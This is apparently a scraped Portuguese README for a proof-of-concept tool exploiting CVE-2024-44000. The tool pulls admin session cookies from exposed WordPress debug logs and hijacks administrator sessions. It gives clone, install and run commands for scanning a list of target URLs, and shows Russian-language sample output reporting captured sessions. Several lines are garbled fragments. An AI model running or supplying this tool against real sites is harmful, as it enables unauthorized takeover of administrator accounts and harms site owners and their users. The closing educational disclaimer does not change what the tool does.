
é uma ferramenta PoC projetada para explorar logs de depuração expostos de forma insegura em sites WordPress e extrair cookies de sessão
GenCookieSessionHijack é uma ferramenta PoC projetada para explorar logs de depuração expostos de forma insegura em sites WordPress e extrair cookies de sessão. Isso permite que o atacante sequestre sessões ativas de administrador e obtenha acesso não autorizado ao painel de administração do WordPress.
wordpress_logged_in).git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt).python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file: Caminho para o arquivo contendo a lista de URLs (padrão: list.txt).-o, --output: Arquivo para salvar os resultados (padrão: result.txt).python GenCookieSessionHijack.py -f targets.txt -o output.txt
Isso lerá a lista de URLs de targets.txt, tentará extrair e usar cookies de sessão, e salvará os resultados em output.txt.
Se a tentativa de sequestro de sessão for bem-sucedida, a ferramenta gerará uma URL com o cookie de sessão de administrador sequestrado e a abrirá diretamente no navegador padrão.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
Esta ferramenta é destinada apenas para fins educacionais e não deve ser usada para atividades ilegais. O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.